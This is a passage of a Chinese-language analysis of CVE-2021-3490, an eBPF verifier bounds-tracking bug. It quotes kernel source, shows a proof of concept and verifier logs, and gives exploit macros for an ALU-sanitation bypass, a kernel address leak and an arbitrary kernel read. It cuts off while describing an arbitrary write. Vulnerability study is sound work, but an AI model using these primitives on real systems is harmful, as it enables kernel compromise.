bool dst_known = tnum_subreg_is_const(dst_reg->var_off);
/* 获取dst_reg->var_off的低32位值,并且分别获取src_reg的s32_min_value和u32_max_value */
struct tnum var32_off = tnum_subreg(dst_reg->var_off);
s32 smin_val = src_reg->s32_min_value;
u32 umax_val = src_reg->u32_max_value;

/* 如果src_reg和dst_reg的值都已经确定,那么则直接返回(因为64位时还会进行更新) */
if (src_known && dst_known)
return;

/* 使用var32_off的值来更新dst_reg的u32_min_value和u32_max_value */
dst_reg->u32_min_value = var32_off.value;
dst_reg->u32_max_value = min(dst_reg->u32_max_value, umax_val);
if (dst_reg->s32_min_value < 0 || smin_val < 0) {
/* 同为负则用src_reg的最大最小值 */
dst_reg->s32_min_value = S32_MIN;
dst_reg->s32_max_value = S32_MAX;
} else {
/* 否则用dst_reg的u32_min_value和u32_max_value更新 */
dst_reg->s32_min_value = dst_reg->u32_min_value;
dst_reg->s32_max_value = dst_reg->u32_max_value;
}
}
  • 在更新 32 位边界值时,如果两个寄存器的低 32 位都为 known 那就可以直接跳过,因为程序认为 64 位时还会进行更新
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
static void scalar_min_max_and(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
/* 判断是否能确定src_reg和dst_reg两个寄存器(是否为'0') */
bool src_known = tnum_is_const(src_reg->var_off);
bool dst_known = tnum_is_const(dst_reg->var_off);
/* 获取dst_reg->var_off的值,并且分别获取src_reg的smin_value和umax_value */
s64 smin_val = src_reg->smin_value;
u64 umax_val = src_reg->umax_value;

/* 如果src_reg和dst_reg的值都已经确定,那么更新边界值 */
if (src_known && dst_known) {
__mark_reg_known(dst_reg, dst_reg->var_off.value);
return;
}

/* We get our minimum from the var_off, since that's inherently
* bitwise. Our maximum is the minimum of the operands' maxima.
*/
dst_reg->umin_value = dst_reg->var_off.value;
dst_reg->umax_value = min(dst_reg->umax_value, umax_val);
if (dst_reg->smin_value < 0 || smin_val < 0) {
/* Lose signed bounds when ANDing negative numbers,
* ain't nobody got time for that.
*/
dst_reg->smin_value = S64_MIN;
dst_reg->smax_value = S64_MAX;
} else {
/* ANDing two positives gives a positive, so safe to
* cast result into s64.
*/
dst_reg->smin_value = dst_reg->umin_value;
dst_reg->smax_value = dst_reg->umax_value;
}
/* We may learn something more from the var_off */
__update_reg_bounds(dst_reg); /* 对比寄存器的var_off并更新边界值 */
}
  • 在更新64位边界值时,若两个寄存器都为 known 就直接调用 __mark_reg_known(PS:64位和32位判断调用 __mark_reg_known 的条件不同,这也引发了漏洞)
  • __mark_reg_known 用于设置一个已经确定的寄存器,简单的调用 tnum_const 设置寄存器 var_offknown,并给对应边界赋值
1
2
3
4
5
6
7
static void __mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{
/* Clear id, off, and union(map_ptr, range) */
memset(((u8 *)reg) + sizeof(reg->type), 0,
offsetof(struct bpf_reg_state, var_off) - sizeof(reg->type));
___mark_reg_known(reg, imm);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
static void ___mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{
reg->var_off = tnum_const(imm);
reg->smin_value = (s64)imm;
reg->smax_value = (s64)imm;
reg->umin_value = imm;
reg->umax_value = imm;

reg->s32_min_value = (s32)imm;
reg->s32_max_value = (s32)imm;
reg->u32_min_value = (u32)imm;
reg->u32_max_value = (u32)imm;
}

在最后还会调用 __update_reg_bounds() 对比寄存器的 var_off 并更新边界值:

1
2
3
4
5
static void __update_reg_bounds(struct bpf_reg_state *reg)
{
__update_reg32_bounds(reg);
__update_reg64_bounds(reg);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
static void __update_reg32_bounds(struct bpf_reg_state *reg)
{
struct tnum var32_off = tnum_subreg(reg->var_off);

/* min signed is max(sign bit) | min(other bits) */
reg->s32_min_value = max_t(s32, reg->s32_min_value,
var32_off.value | (var32_off.mask & S32_MIN));
/* max signed is min(sign bit) | max(other bits) */
reg->s32_max_value = min_t(s32, reg->s32_max_value,
var32_off.value | (var32_off.mask & S32_MAX));
reg->u32_min_value = max_t(u32, reg->u32_min_value, (u32)var32_off.value);
reg->u32_max_value = min(reg->u32_max_value,
(u32)(var32_off.value | var32_off.mask));
}
1
2
3
4
5
6
7
8
9
10
11
12
static void __update_reg64_bounds(struct bpf_reg_state *reg)
{
/* min signed is max(sign bit) | min(other bits) */
reg->smin_value = max_t(s64, reg->smin_value,
reg->var_off.value | (reg->var_off.mask & S64_MIN));
/* max signed is min(sign bit) | max(other bits) */
reg->smax_value = min_t(s64, reg->smax_value,
reg->var_off.value | (reg->var_off.mask & S64_MAX));
reg->umin_value = max(reg->umin_value, reg->var_off.value);
reg->umax_value = min(reg->umax_value,
reg->var_off.value | reg->var_off.mask);
}
  • 计算方法如下:
    • 最小边界值 = [min_value , var_off.value | (var_off.mask & MIN) ] 中的最大者
    • 最大边界值 = [max_value , var_off.value | (var_off.mask & MAX) ] 中的最小者

但这样存在一个问题,若存在一个高32位 unknown 低32位 known 的寄存器:

  • 在理论上,程序执行时 scalar32_min_max_and 就能确定该寄存器的值,应该调用 __mark_reg_known 进行更新
  • 但程序认为在 scalar_min_max_and 中也能检查寄存器是否 known,因此选择在 scalar_min_max_and 中调用 __mark_reg_known,而 scalar32_min_max_and 中直接返回
  • 核心问题就是,函数 scalar32_min_max_andscalar_min_max_and 中判断寄存器是否 known 的条件不同,导致原本应该执行 __mark_reg_known 的程序没有执行

如果有以下两个寄存器:

  • R2 = { .value = 0x1, .mask = 0xffffffff00000000 }:该寄存器低 32 位值已知为 0x1,高 32 位不确定
  • R3 = { .value = 0x100000002, .mask = 0x0 }:该寄存器 64 位值全部已知,为 0x100000002

假如我们将 R2 与 R3 做与运算,其结果为 { .value = 0, .mask = 0x100000000 },详细调用过程如下:

  • 首先执行 adjust_scalar_min_max_vals 函数,随后会进入 tnum_and 函数
    • 该函数返回 R2.var_off = {mask = 0x100000000; value=0x0}
    • 由于 R2 的高32位是不确定,导致 0x100000002 中高出32位的非“0”部分不确定,所以最终 R2.var_off.mask = 0x100000000(仅有第32位不确定)
  • 然后执行 scalar32_min_max_and 检查寄存器32位的值的范围
    • 这里由于 R2R3 两个寄存器的低32位的值都是确定的,该函数直接返回
  • 接着执行 scalar_min_max_and 检查寄存器64位的值的范围
    • 由于 R2 寄存器第32位仍不确定,因此不会调用 __mark_reg_known
  • 在末尾调用 __update_reg_bounds,这个函数会对 R2 的值做相应修改:
    • 设置 R2.u32_max_value=0x0(由于 R2.var_off.value=0 < R2.u32_max_value=1
    • 设置 R2.u32_min_value=0x1(由于 R2.var_off.value=0 < R2.u32_min_value=1
  • 最后执行 __reg_bound_offset 函数,也不会改变 R2 的属性

因此经过该轮计算之后 R2 的最小值为 1,最大值为 0,而这显然是不合理的

测试样例如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
#define _GNU_SOURCE
#include <sys/types.h>
#include <stdio.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/sem.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/wait.h>
#include <semaphore.h>
#include <poll.h>
#include <sched.h>
#include <ctype.h>

#include "kernelpwn.h"
#include "bpf_tools.h"

#define MAP_SIZE 0x2000

#define POC_PROG(__map_fd) \
/* Load value from map */ \
BPF_LD_MAP_FD(BPF_REG_9, __map_fd), \ /* r9 = 0 */
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), \ /* r1 = r9 */
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \ /* r2 = r10(rbp) */
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \ /* r2 += -8 */
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, 0), \ /* *(r2 + 0) = 0 */
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
/* if success, r0 will be ptr to value, 0 for failed */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \ /* if r0 != 0x0 goto pc+1 */
BPF_EXIT_INSN(), \ /* jmp exit */
/* load value into r2, make it part-unknown */ \
BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_0, 0), \ /* r2 = *(r0 + 0) */
BPF_MOV64_IMM(BPF_REG_4, 0xffffffff), \ /* r4 = -1 */
BPF_ALU64_IMM(BPF_LSH, BPF_REG_4, 32), \ /* r4 <<= 32 */
BPF_ALU64_REG(BPF_AND, BPF_REG_2, BPF_REG_4), \ /* r2 &= r4 */
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 0x1), \ /* r2 += 1 */
/* r3 = 0x100000002 */ \
BPF_MOV64_IMM(BPF_REG_3, 0x1), \ /* r3 = 1 */
BPF_ALU64_IMM(BPF_LSH, BPF_REG_3, 32), \ /* r3 <<= 32 */
BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, 0x2), \ /* r3 += 2 */
/* triger the vulnerability */ \
BPF_ALU64_REG(BPF_AND, BPF_REG_2, BPF_REG_3) /* r2 &= r3 */


int main(int argc , char **argv, char **envp)
{
int map_fd;
int key;
size_t value[0x1000];
int log_fd;

map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, 4, MAP_SIZE, 0x100);
if (map_fd < 0) {
err_exit("FAILED to create eBPF map!");
}

key = 0;
value[0] = 0;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0) {
err_exit("FAILED to load value into map!");
}

struct bpf_insn prog[] = {
POC_PROG(map_fd),
BPF_EXIT_INSN()
};
run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 2, 1);

return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
/ $ ./exp
func#0 @0
0: R1=ctx(id=0,off=0,imm=0) R10=fp0
0: (18) r9 = 0x0
2: R1=ctx(id=0,off=0,imm=0) R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0
2: (bf) r1 = r9
4: (07) r2 += -8
2: (bf) r1 = r9
3: R1_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0
3: (bf) r2 = r10
4: R1_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=fp0 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0
4: (07) r2 += -8
5: R1_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=fp-8 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0
5: (7a) *(u64 *)(r2 +0) = 0
6: R1_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=fp-8 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8_w=mmmmmmmm
6: (85) call bpf_map_lookup_elem#1
7: R0_w=map_value_or_null(id=1,off=0,ks=4,vs=8192,imm=0) R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8_w=mmmmmmmm
7: (55) if r0 != 0x0 goto pc+1
R0_w=invP0 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8_w=mmmmmmmm
8: R0_w=invP0 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8_w=mmmmmmmm
8: (95) exit
9: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
9: (79) r2 = *(u64 *)(r0 +0)
R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
10: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0) R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
10: (b7) r4 = -1
11: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0) R4_w=invP-1 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
11: (67) r4 <<= 32 /* r4=0xffffffff00000000 */
12: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0) R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
12: (5f) r2 &= r4 /* 取r2的高32位 */
13: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smax_value=9223372032559808512,umax_value=18446744069414584320,var_off=(0x0; 0xffffffff00000000),s32_min_value=0,s32_max_value=0,u32_max_val
ue=0) R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
13: (07) r2 += 1
14: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smin_value=-9223372036854775807,smax_value=9223372032559808513,umin_value=1,umax_value=18446744069414584321,var_off=(0x1; 0xffffffff00000000
),s32_min_value=1,s32_max_value=1,u32_max_value=1) R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
/* r2={s32_min_value=1,s32_max_value=1},var_off=(0x1; 0xffffffff00000000) */
14: (b7) r3 = 1
15: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smin_value=-9223372036854775807,smax_value=9223372032559808513,umin_value=1,umax_value=18446744069414584321,var_off=(0x1; 0xffffffff00000000
),s32_min_value=1,s32_max_value=1,u32_max_value=1) R3_w=invP1 R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
15: (67) r3 <<= 32
16: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smin_value=-9223372036854775807,smax_value=9223372032559808513,umin_value=1,umax_value=18446744069414584321,var_off=(0x1; 0xffffffff00000000
),s32_min_value=1,s32_max_value=1,u32_max_value=1) R3_w=invP4294967296 R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
16: (07) r3 += 2 /* r3=0x100000002 */
17: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smin_value=-9223372036854775807,smax_value=9223372032559808513,umin_value=1,umax_value=18446744069414584321,var_off=(0x1; 0xffffffff00000000
),s32_min_value=1,s32_max_value=1,u32_max_value=1) R3_w=invP4294967298 R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
/* r2={s32_min_value=1,s32_max_value=1},var_off=(0x1; 0xffffffff00000000)
r3=0x100000002,var_off=(0x100000002; 0x0) */
17: (5f) r2 &= r3
18: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,umax_value=4294967296,var_off=(0x0; 0x100000000),s32_min_value=1,s32_max_value=0,u32_min_value=1,u32_max_value=0) R3_w=invP4294967298 R4_w=i
nvP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
/* 注意r2中{s32_min_value=1,s32_max_value=0},证明漏洞已经生效 */
18: (95) exit
R0 leaks addr as return value
processed 18 insns (limit 1000000) max_states_per_insn 0 total_states 1 peak_states 1 mark_read 1

入侵思路

核心思路参考:[漏洞分析] 【CVE-2021-3490】eBPF verifier 32 位边界计算错误漏洞分析与利用 (buaq.net)

利用漏洞构造一个最小边界值为 “1”、最大边界值为 “0” 的寄存器:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#define VULN_REG    BPF_REG_6
#define BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, __dst_reg) \
/* get a pointer to bpf_array */ \
BPF_LD_MAP_FD(BPF_REG_9, __map_fd), \
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, __idx), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
/* if success, r0 will be ptr to value, 0 for failed */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(), \
/* mov the result back and clear R0 */ \
BPF_MOV64_REG(__dst_reg, BPF_REG_0), \
BPF_MOV64_IMM(BPF_REG_0, 0)

#define TRIGGER_VULN(__map_fd) \
/* load value into r2, make it part-unknown */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, VULN_REG, BPF_REG_8, 0), \
BPF_MOV64_IMM(BPF_REG_4, 0xffffffff), \
BPF_ALU64_IMM(BPF_LSH, BPF_REG_4, 32), \
BPF_ALU64_REG(BPF_AND, VULN_REG, BPF_REG_4), \
BPF_ALU64_IMM(BPF_ADD, VULN_REG, 0x1), \
/* r3 = 0x100000002 */ \
BPF_MOV64_IMM(BPF_REG_3, 0x1), \
BPF_ALU64_IMM(BPF_LSH, BPF_REG_3, 32), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, 0x2), \
/* triger the vulnerability */ \
BPF_ALU64_REG(BPF_AND, VULN_REG, BPF_REG_3)
  • 因为 R1~R5 有的时候要用来作为函数参数,所以这里在 R6 上构造
  • 此时 R6 32 位边界值为 [1, 0] ,32位运行时值为 0

构造运行时为 “1” 但 verifier 确信为 “0” 的寄存器:

1
2
3
4
5
6
7
8
9
10
11
#define MAKE_VULN_REG(__map_fd)                         \
/* load value into r3, make it [0, 1] under 32 bit */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), \
BPF_JMP32_IMM(BPF_JLE, BPF_REG_7, 1, 2), \
BPF_MOV64_IMM(BPF_REG_0, 0), \
BPF_EXIT_INSN(), \
BPF_ALU64_REG(BPF_ADD, VULN_REG, BPF_REG_7), \
BPF_ALU64_IMM(BPF_ADD, VULN_REG, 0x1), \
BPF_ALU64_IMM(BPF_AND, VULN_REG, 0x1), \
BPF_MOV64_IMM(BPF_REG_0, 0)
  • 构造出另一个 32 位边界值为 [0, 1] ,32位运行时值为 0 寄存器 R7
  • 把寄存器 R6 和 R7 相加,得到新的 R6,边界值为 [1, 1] ,32位运行时值为 0,于是便获得了一个运行时为 “0” 但 verifier 认为是 “1” 的寄存器
  • 如果我们再给 R6 加上 1 ,从而使得边界值为 [2, 2] ,但实际上的 32 位值为 1
  • 再将 R6 与 1& 运算,从而使得边界值为 [0, 0] ,但实际上的 32 位值为 1
  • 最终 verifier 便会认为该寄存器的值变为 “0”,但其实际上的运行时值为 “1”
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
36: (07) r6 += 1
37: R0_w=invP0 R6_w=invP(id=0,smin_value=-9223372036854775806,smax_value=9223372
032559808514,umin_value=2,umax_value=18446744069414584322,var_off=(0x2; 0xffffff
ff00000000),s32_min_value=2,s32_max_value=2,u32_max_value=2) R7_w=invP(id=0,smax
_value=9223372032559808513,umax_value=18446744069414584321,var_off=(0x0; 0xfffff
fff00000001),s32_min_value=0,s32_max_value=1,u32_max_value=1) R8_w=map_value(id=
0,off=0,ks=4,vs=8192,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp
-8=mmmmmmmm
/* r6={s32_min_value=2,s32_max_value=2},var_off=(0x2; 0xffffffff00000000) */
37: (57) r6 &= 1
38: R0_w=invP0 R6_w=invP0 R7_w=invP(id=0,smax_value=9223372032559808513,umax_val
ue=18446744069414584321,var_off=(0x0; 0xffffffff00000001),s32_min_value=0,s32_ma
x_value=1,u32_max_value=1) R8_w=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R9=map_
ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
/* r6=0,var_off=(0x0; 0xffffffff00000000) */

泄露内核基地址:

对于 BPF_MAP_TYPE_ARRAY 类型 的 map 而言,其 wrapper 为 bpf_array 类型(即 bpf_map 内嵌于该结构体中),数据则直接存放在其内部的 value 数组成员当中,因此在查找元素时我们获得的其实是一个指向 bpf_array 内部的指针

1
2
3
4
5
6
7
8
9
10
11
struct bpf_array {
struct bpf_map map;
u32 elem_size;
u32 index_mask;
struct bpf_array_aux *aux;
union {
char value[0] __aligned(8);
void *ptrs[0] __aligned(8);
void __percpu *pptrs[0] __aligned(8);
};
};
  • 因此我们只需要前向读取便能读取到 bpf_map,之后可以通过 bpf_map 的函数表泄露内核地址

理论上我们可以构造寄存器,使 verifier 将负数识别为 “0”,但实际上我们还要突破 ALU Sanitation 的检查:

  • ALU Sanitation 是一个用于运行时动态检测的功能,通过对程序正在处理的实际值进行运行时检查以弥补 verifier 静态分析的不足
  • 核心原理就是在 eBPF 程序中的每一条指令前面都添加上额外的辅助指令
1
2
3
4
5
6
7
8
9
10
11
*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit - 1);
*patch++ = BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0);
*patch++ = BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63);
if (issrc) {
*patch++ = BPF_ALU64_REG(BPF_AND, BPF_REG_AX, off_reg);
insn->src_reg = BPF_REG_AX;
} else {
*patch++ = BPF_ALU64_REG(BPF_AND, off_reg, BPF_REG_AX);
}
  • 其中 aux->alu_limit 为当前指针运算范围,初始时为 “0”,与指针所做的常量运算同步
  • 对于减法而言可读范围为 (ptr - alu_limit, ptr](这里保证了指针的偏移不会为负)

由于我们有运行时为 “1”,但 verifier 认为是 “0” 的寄存器,我们可以这样调整范围:

  • 构造另外一个同样是运行时值为 “1”,但 verifier 认为是 “0” 的寄存器 R8(可以选择直接将 R6 拷贝给 R8)
  • 令 R7 指向 map 第一个元素的第一个字节 value[0]
  • 将 R7 加上 0x1000R7 = value[0x1000]alu_limit = 0x1000
  • 将 R8 乘上 0x1000R8 = 0x1000
  • 执行 R7 -= R8,由于 verifier 认为 R8 为 “0”,因此 alu_limit 保持不变,但 R7 实际上已经指回了 value[0]
  • 执行 R7 -= 0x110R7 = value[-0x110]alu_limit = 0x1000
1
2
3
4
5
6
7
8
9
10
11
12
#define LEAK_MAP_OPS(__map_fd)                             \
/* extend the alu->limit and do the oob read */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x110), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0), \
BPF_READ_ARRAY_MAP_IDX(1, __map_fd, BPF_REG_7), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0)

构造任意读 RAA:

现在我们能够读写 bpf_map 中的数据,我们需要注意其中的 btf 指针:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
struct bpf_map {
const struct bpf_map_ops *ops ____cacheline_aligned;
struct bpf_map *inner_map_meta;
#ifdef CONFIG_SECURITY
void *security;
#endif
enum bpf_map_type map_type;
u32 key_size;
u32 value_size;
u32 max_entries;
u32 map_flags;
int spin_lock_off; /* >=0 valid offset, <0 error */
u32 id;
int numa_node;
u32 btf_key_type_id;
u32 btf_value_type_id;
struct btf *btf;
......
};

但函数 bpf_map_get_info_by_fd 被调用时,程序会把 bpf_map->btf.id 拷贝给用户空间

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
static int bpf_map_get_info_by_fd(struct file *file,
struct bpf_map *map,
const union bpf_attr *attr,
union bpf_attr __user *uattr)
{
struct bpf_map_info __user *uinfo = u64_to_user_ptr(attr->info.info);
struct bpf_map_info info;
u32 info_len = attr->info.info_len;
int err;

......

if (map->btf) {
info.btf_id = btf_obj_id(map->btf);
info.btf_key_type_id = map->btf_key_type_id;
info.btf_value_type_id = map->btf_value_type_id;
}

......

if (copy_to_user(uinfo, &info, info_len) ||
put_user(info_len, &uattr->info.info_len))
return -EFAULT;

return 0;
}

劫持 bpf_map->btf 即可完成 RAA:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#define READ_ARBITRARY_ADDR(__map_fd, __idx)            \
/* extend the alu->limit and do the oob read */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xd0), \
/* write the value into bpf_map->btf */ \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_8, 0), \
BPF_ALU64_IMM(BPF_SUB, BPF_REG_1, 0x58), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_1, 0)
  • 前半部分使用相同的方法来绕过 alu_limit,后半部分尝试覆盖 bpf_map->btf(这里的 0x58 是 btf.id 的偏移)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
static size_t read_arbitrary_addr_4_bytes(int map_fd, int idx){
size_t data;
int ret;
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
READ_ARBITRARY_ADDR(map_fd, idx),
BPF_EXIT_INSN()};

ret = run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 0);
if (ret < 0){
return 0;
}

struct bpf_map_info info;
union bpf_attr attr = {
.info.bpf_fd = map_fd,
.info.info_len = sizeof(info),
.info.info = (uint64_t)&info,
};

memset(&info, 0, sizeof(info));
ret = bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);
if (ret < 0){
return 0;
}
data = info.btf_id;
return data;
}

size_t read_arbitrary_addr(int map_fd, size_t addr)
{
size_t data;
int key;
size_t value[0x1000];

key = 1;
value[0] = addr;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0){
err_exit("FAILED to load value into map!");
}
key = 2;
value[0] = addr + 4;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0){
err_exit("FAILED to load value into map!");
}
data = read_arbitrary_addr_4_bytes(map_fd, 2);
data <<= 32;
data += read_arbitrary_addr_4_bytes(map_fd, 1);
return data;
}

构造任意写 WAA:

核心思想就是覆盖 bpf_map->opsbpf_array.value(可控地址),并在 bpf_array.value 上伪造一个 fake ops 将 ops->map_push_elem 替换为 array_map_get_next_key

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
{
struct bpf_array *array = container_of(map, struct bpf_array, map);
u32 index = key ? *(u32 *)key : U32_MAX;
u32 *next = (u32 *)next_key;

if (index >= array->map.max_entries) {
*next = 0;
return 0;
}

if (index == array->map.max_entries - 1)
return -ENOENT;

*next = index + 1;
return 0;
}
  • key 小于 map.max_entries 时,key 会被写入到 next_key 当中
  • 如果正常调用 map_get_next_key:只能控制 key 但是 next_key 不能控制
  • 如果通过函数指针 ops->map_push_elem 进行调用:可以控制这两个参数

当我们更新 eBPF map 时,若 map 类型为 BPF_MAP_TYPE_QUEUEBPF_MAP_TYPE_STACK,则函数 bpf_map->ops->map_push_elem 就会被调用,不过在函数 map_update_elem 中还有一个检查:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
static int map_update_elem(union bpf_attr *attr)
{

......

if ((attr->flags & BPF_F_LOCK) &&
!map_value_has_spin_lock(map)) {
err = -EINVAL;
goto err_put;
}

......

return err;
}
1
2
3
4
static inline bool map_value_has_spin_lock(const struct bpf_map *map)
{
